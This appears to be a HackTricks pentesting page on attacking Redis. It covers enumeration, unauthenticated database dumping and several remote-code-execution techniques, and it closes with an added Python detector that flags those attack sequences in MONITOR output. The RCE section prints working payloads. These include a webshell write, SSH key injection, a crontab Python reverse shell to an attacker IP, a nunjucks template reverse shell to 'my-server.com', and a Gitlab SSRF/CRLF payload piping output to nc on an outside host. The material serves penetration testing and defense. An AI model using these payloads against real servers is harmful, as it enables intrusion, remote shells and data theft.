# 6379 - Pentesting Redis

{% hint style="success" %}
Learn & practice AWS Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)

Support HackTricks

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!

**Hacking Insights**\
Engage with content that delves into the thrill and challenges of hacking

**Real-Time Hack News**\
Keep up-to-date with fast-paced hacking world through real-time news and insights

**Latest Announcements**\
Stay informed with the newest bug bounties launching and crucial platform updates

**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!

## Basic Information

From [the docs](https://redis.io/topics/introduction): Redis is an open source (BSD licensed), in-memory **data structure store**, used as a **database**, cache and message broker.

By default Redis uses a plain-text protocol, but keep in mind that it can also implement **ssl/tls**. Learn how to [run Redis with ssl/tls here](https://fossies.org/linux/redis/TLS.md).

**Default port:** 6379
```
PORT     STATE SERVICE  VERSION
6379/tcp open  redis    Redis key-value store 4.0.9
```

## Automatic Enumeration

Some automated tools that can help obtaining info from a redis instance:
```bash
nmap --script redis-info -sV -p 6379 <IP>
msf> use auxiliary/scanner/redis/redis_server
```

## Manual Enumeration

### Banner

Redis is a **text based protocol**: you can just **send the commands in a socket** and the returned values will be readable. Also remember that Redis can run using **ssl/tls** (but this is very unusual).

In a regular Redis instance you can just connect using `nc` or you could also use `redis-cli`:
```bash
nc -vn 10.10.10.10 6379
redis-cli -h 10.10.10.10 # sudo apt-get install redis-tools
```

The **first command** you could try is **`info`**. It **may return output with information** of the Redis instance **or something** like the following is returned:
```
-NOAUTH Authentication required.
```
In this last case, this means that **you need valid credentials** to access the Redis instance.

### Redis Authentication

**By default** Redis can be accessed **without credentials**. However, it can be **configured** to support **only password, or username + password**.\
It's possible to **set a password** in the _**redis.conf**_ file with the parameter `requirepass` **or temporarily** until the service restarts by connecting to it and running: `config set requirepass p@ss$12E45`.\
Also, a **username** can be configured in the parameter `masteruser` inside the _**redis.conf**_ file.

{% hint style="info" %}
If only password is configured the username used is "**default**".\
Also, note that there is **no way to find externally** if Redis was configured with only password or username+password.
{% endhint %}

In cases like this one you will **need to find valid credentials** to interact with Redis so you could try to [**brute-force**](../generic-methodologies-and-resources/brute-force.md#redis) it.\
**In case you found valid credentials you need to authenticate the session** after establishing the connection with the command:
```bash
AUTH <username> <password>
```
**Valid credentials** will be responded with: `+OK`

### **Authenticated enumeration**

If the Redis server allows **anonymous connections** or if you obtained valid credentials, you can start the enumeration process for the service using the following **commands**:
```bash
INFO
[ ... Redis response with info ... ]
client list
[ ... Redis response with connected clients ... ]
CONFIG GET *
[ ... Get config ... ]
```

**Other Redis commands** [**can be found here**](https://redis.io/topics/data-types-intro) **and** [**here**](https://lzone.de/cheat-sheet/Redis)**.**

Note that the **Redis commands of an instance can be renamed** or removed in the _redis.conf_ file. For example, this line will remove the command FLUSHDB:
```
rename-command FLUSHDB ""
```
More about configuring a Redis service securely here: [https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04](https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04)

You can also **monitor in real time the Redis commands** being executed with the command **`monitor`** or get the **25 slowest queries** with **`slowlog get 25`**

Find more interesting information about more Redis commands here: [https://lzone.de/cheat-sheet/Redis](https://lzone.de/cheat-sheet/Redis)

### **Dumping Database**

Inside Redis the **databases are numbers starting from 0**. You can find out whether any are in use in the output of the command `info` inside the "Keyspace" chunk:

![](<../.gitbook/assets/image (766).png>)

Or you can just get all the **keyspaces** (databases) with:
```
INFO keyspace
```
In that example the **databases 0 and 1** are being used. **Database 0 contains 4 keys and database 1 contains 1**. By default Redis will use database 0. In order to dump for example database 1 you need to do:
```bash
SELECT 1
[ ... Indicate the database ... ]
KEYS *
[ ... Get Keys ... ]
GET <KEY>
[ ... Get Key ... ]
```
If you get the error `-WRONGTYPE Operation against a key holding the wrong kind of value` while running `GET <KEY>` it's because the key may be something other than a string or an integer and requires a specific operator to display it.

To know the type of the key, use the `TYPE` command, example below for list and hash keys.
```bash
TYPE <KEY>
[ ... Type of the Key ... ]
LRANGE <KEY> 0 -1
[ ... Get list items ... ]
HGET <KEY> <FIELD>
[ ... Get hash item ... ]

# If the type used is weird you can always do:
DUMP <KEY>
```

**Dump the database with npm** [**redis-dump**](https://www.npmjs.com/package/redis-dump) **or python** [**redis-utils**](https://pypi.org/project/redis-utils/)
## Redis RCE

### Interactive Shell

[**redis-rogue-server**](https://github.com/n0b0dyCN/redis-rogue-server) can automatically get an interactive shell or a reverse shell in Redis(<=5.0.5).
```
./redis-rogue-server.py --rhost <TARGET_IP> --lhost <ATTACKER_IP>
```

### PHP Webshell

Info from [**here**](https://web.archive.org/web/20191201022931/http://reverse-tcp.xyz/pentest/database/2017/02/09/Redis-Hacking-Tips.html). You must know the **path** of the **Web site folder**:
```
root@Urahara:~# redis-cli -h 10.85.0.52
10.85.0.52:6379> config set dir /usr/share/nginx/html
OK
10.85.0.52:6379> config set dbfilename redis.php
OK
10.85.0.52:6379> set test ""
OK
10.85.0.52:6379> save
OK
```
If there is an access error when requesting the webshell, you can delete the database after taking a backup and try again; remember to restore the database.

### Template Webshell

As in the previous section you could also overwrite some html template file that is going to be interpreted by a template engine and get a shell.

For example, following [**this writeup**](https://www.neteye-blog.com/2022/05/cyber-apocalypse-ctf-2022-red-island-writeup/), you can see that the attacker injected a **rev shell in an html** interpreted by the **nunjucks template engine:**
```javascript
{{ ({}).constructor.constructor(
    "var net = global.process.mainModule.require('net'),
    cp = global.process.mainModule.require('child_process'),
    sh = cp.spawn('sh', []);
    var client = new net.Socket();
    client.connect(1234, 'my-server.com', function(){
      client.pipe(sh.stdin);
      sh.stdout.pipe(client);
      sh.stderr.pipe(client);
    });"
)()}}
```

{% hint style="warning" %}
Note that **several template engines cache** the **templates** in **memory**, so even if you overwrite them, the new one **won't be executed**. In these cases, either the developer left auto-reload active or you need to DoS the service (and expect that it will be relaunched automatically).
{% endhint %}

### SSH

Example [from here](https://blog.adithyanak.com/oscp-preparation-guide/enumeration)

Please be aware that the **`config get dir`** result can be changed by other manual exploitation commands. It is advisable to run it first, right after logging in to Redis.

In the output of **`config get dir`** you could find the **home** of the **redis user** (usually _/var/lib/redis_ or _/home/redis/.ssh_), and knowing this you know where you can write the `authorized_keys` file to access via ssh **with the user redis**. If you know the home of another valid user where you have write permissions you can also abuse it:

1. Generate a ssh public-private key pair on your pc: **`ssh-keygen -t rsa`**
2. Write the public key to a file: **`(echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt`**
3. Import the file into redis: **`cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key`**
4. Save the public key to the **authorized\_keys** file on the redis server:
```
root@Urahara:~# redis-cli -h 10.85.0.52
10.85.0.52:6379> config set dir /var/lib/redis/.ssh
OK
10.85.0.52:6379> config set dbfilename "authorized_keys"
OK
10.85.0.52:6379> save
OK
```
5. Finally, you can **ssh** to the **redis server** with the private key: **ssh -i id\_rsa redis@10.85.0.52**

**This technique is automated here:** [https://github.com/Avinash-acid/Redis-Server-Exploit](https://github.com/Avinash-acid/Redis-Server-Exploit)

### Crontab
```
root@Urahara:~# echo -e "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.85.0.53\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"|redis-cli -h 10.85.0.52 -x set 1
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dir /var/spool/cron/crontabs/
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dbfilename root
OK
root@Urahara:~# redis-cli -h 10.85.0.52 save
OK
```
The last example is for Ubuntu; for **Centos**, the above command should be: `redis-cli -h 10.85.0.52 config set dir /var/spool/cron/`

This method can also be used to earn bitcoin: [yam](https://www.v2ex.com/t/286981#reply14)

### Load Redis Module

1. Following the instructions from [https://github.com/n0b0dyCN/RedisModules-ExecuteCommand](https://github.com/n0b0dyCN/RedisModules-ExecuteCommand) you can **compile a redis module to execute arbitrary commands**.
2. Then you need some way to **upload the compiled** module
3. **Load the uploaded module** at runtime with `MODULE LOAD /path/to/mymodule.so`
4. **List loaded modules** to check it was correctly loaded: `MODULE LIST`
5. **Execute** **commands**:
```
127.0.0.1:6379> system.exec "id"
"uid=0(root) gid=0(root) groups=0(root)\n"
127.0.0.1:6379> system.exec "whoami"
"root\n"
127.0.0.1:6379> system.rev 127.0.0.1 9999
```
6. Unload the module whenever you want: `MODULE UNLOAD mymodule`

### LUA sandbox bypass

[**Here**](https://www.agarri.fr/blog/archives/2014/09/11/trying\_to\_hack\_redis\_via\_http\_requests/index.html) you can see that Redis uses the command **EVAL** to execute **Lua code sandboxed**. In the linked post you can see **how to abuse it** using the **dofile** function, but [apparently](https://stackoverflow.com/questions/43502696/redis-cli-code-execution-using-eval) this isn't possible anymore. Anyway, if you can **bypass the Lua** sandbox you could **execute arbitrary** commands on the system. Also, from the same post you can see some **options to cause DoS**.

Some **CVEs to escape from LUA**:

* [https://github.com/aodsec/CVE-2022-0543](https://github.com/aodsec/CVE-2022-0543)

### Master-Slave Module

All operations on the master redis are automatically synchronised to the slave redis, which means we can treat the vulnerable redis as a slave connected to a master redis that we control, and then push commands to it from our own redis.
```
master redis : 10.85.0.51 (Hacker's Server)
slave redis : 10.85.0.52 (Target Vulnerability Server)

A master-slave connection will be established from the slave redis and the master redis:
redis-cli -h 10.85.0.52 -p 6379 slaveof 10.85.0.51 6379

Then you can login to the master redis to control the slave redis:
redis-cli -h 10.85.0.51 -p 6379
set mykey hello
set mykey2 helloworld
```

## SSRF talking to Redis

If you can send a **clear text** request **to Redis**, you can **communicate with it**, as Redis will read the request line by line and just respond with errors to the lines it doesn't understand:
```
-ERR wrong number of arguments for 'get' command
-ERR unknown command 'Host:'
-ERR unknown command 'Accept:'
-ERR unknown command 'Accept-Encoding:'
-ERR unknown command 'Via:'
-ERR unknown command 'Cache-Control:'
-ERR unknown command 'Connection:'
```
Therefore, if you find a **SSRF vuln** in a website and you can **control** some **headers** (maybe with a CRLF vuln) or **POST parameters**, you will be able to send arbitrary commands to Redis.

### Example: Gitlab SSRF + CRLF to Shell

In **Gitlab11.4.7** a **SSRF** vulnerability and a **CRLF** were discovered. The **SSRF** vulnerability was in the **import project from URL functionality** when creating a new project and allowed access to arbitrary IPs in the form \[0:0:0:0:0:ffff:127.0.0.1] (this will access 127.0.0.1), and the **CRLF** vuln was exploited just by **adding %0D%0A** characters to the **URL**.

Therefore, it was possible to **abuse these vulnerabilities to talk with the Redis instance** that **manages queues** for **gitlab** and abuse those queues to **obtain code execution**. The Redis queue abuse payload is:
```
multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|whoami | nc 192.241.233.143 80\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec
```
And the **URL encoded** request **abusing SSRF** and **CRLF** to execute `whoami` and send back the output via `nc` is:
```
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20127%2E0%2E0%2E1%202222%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf123321.git
```
_For some reason (as for the author of_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _where this info was taken from) the exploitation worked with the `git` scheme and not with the `http` scheme._
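Every technique in the RCE section above leaves the same footprint in the command stream: a `CONFIG SET dir` and `CONFIG SET dbfilename` followed by `SAVE` from one client (webshell, SSH key, crontab), a `SLAVEOF`/`REPLICAOF` pointing at an outside host (rogue master), or a `MODULE LOAD`. The `monitor` command mentioned in the enumeration section prints exactly that stream, so it is a cheap place to look. The following Python detector is an added example, not code from the page or from any of the linked projects: the MONITOR lines are constructed for the demo (they reuse the page's example hosts), and the alert categories, the choice to stage `dir`/`dbfilename` per client until a `SAVE`, and treating every `EVAL` as low severity are my own.

```python
"""Flag the Redis abuse sequences described above in MONITOR output (added example)."""
import re
from collections import defaultdict, namedtuple

# MONITOR prints one line per command:  <unix-ts> [<db> <client-addr>] "arg" "arg" ...
MONITOR_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<args>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')  # one quoted arg, allowing \" and \\ inside

Alert = namedtuple("Alert", "client kind detail")


def parse_monitor_line(line):
    """Return {'ts', 'db', 'client', 'args'} or None for lines that are not MONITOR records."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    args = [re.sub(r'\\(["\\])', r'\1', a) for a in ARG_RE.findall(m["args"])]
    return {"ts": float(m["ts"]), "db": int(m["db"]), "client": m["client"], "args": args}


def detect(lines):
    """Stateful pass over MONITOR lines; returns a list of Alert."""
    alerts = []
    staged = defaultdict(dict)  # client -> {"dir": ..., "dbfilename": ...} seen so far
    for line in lines:
        ev = parse_monitor_line(line)
        if not ev or not ev["args"]:
            continue
        client, cmd, args = ev["client"], ev["args"][0].lower(), ev["args"][1:]
        sub = args[0].lower() if args else ""

        if cmd == "config" and sub == "set" and len(args) >= 3:
            key = args[1].lower()
            if key in ("dir", "dbfilename"):
                staged[client][key] = args[2]  # remember it; alert when the SAVE lands
            elif key == "requirepass":
                alerts.append(Alert(client, "auth-change", "CONFIG SET requirepass from a client"))
        elif cmd in ("save", "bgsave") and staged.get(client):
            st = staged.pop(client)
            target = f"{st.get('dir', '<unchanged>')}/{st.get('dbfilename', '<unchanged>')}"
            alerts.append(Alert(client, "file-write", f"RDB dump aimed at {target} after CONFIG SET"))
        elif cmd in ("slaveof", "replicaof") and len(args) >= 2:
            if not (args[0].lower() == "no" and args[1].lower() == "one"):
                alerts.append(Alert(client, "rogue-master", f"replication pointed at {args[0]}:{args[1]}"))
        elif cmd == "module" and sub == "load":
            path = args[1] if len(args) > 1 else "?"
            alerts.append(Alert(client, "module-load", f"native module loaded from {path}"))
        elif cmd in ("eval", "evalsha"):
            alerts.append(Alert(client, "lua-eval", "server-side Lua executed (low severity; many apps use EVAL)"))
        elif cmd in ("flushall", "flushdb"):
            alerts.append(Alert(client, "flush", f"{cmd.upper()} issued"))
    return alerts


# Constructed MONITOR output for the demo; hosts reuse the page's example addresses.
SAMPLE_MONITOR = """\
1700000000.000001 [0 10.85.0.53:51234] "get" "session:abc"
1700000000.000002 [0 10.85.0.53:51234] "config" "set" "dir" "/var/lib/redis/.ssh"
1700000000.000003 [0 10.85.0.53:51234] "config" "set" "dbfilename" "authorized_keys"
1700000000.000004 [0 10.85.0.53:51234] "set" "ssh_key" "\\n\\nssh-rsa AAAA...\\n\\n"
1700000000.000005 [0 10.85.0.53:51234] "save"
1700000000.000006 [0 10.0.0.7:40000] "set" "cache:item" "ok"
1700000000.000007 [0 10.85.0.53:51235] "slaveof" "10.85.0.51" "6379"
1700000000.000008 [0 10.85.0.53:51236] "module" "load" "/tmp/mymodule.so"
1700000000.000009 [0 10.0.0.7:40000] "replicaof" "no" "one"
"""

if __name__ == "__main__":
    for a in detect(SAMPLE_MONITOR.splitlines()):
        print(f"{a.kind:12} {a.client:20} {a.detail}")
```

On the sample it raises three alerts (the `authorized_keys` write, the replication change to 10.85.0.51, and the module load); the `replicaof no one` line, which detaches a replica, is deliberately not flagged. Feed it `redis-cli monitor` output, or the same sequence pulled from an audit proxy, to run it against a live instance; MONITOR itself costs throughput, so sampling or a short window is the usual compromise.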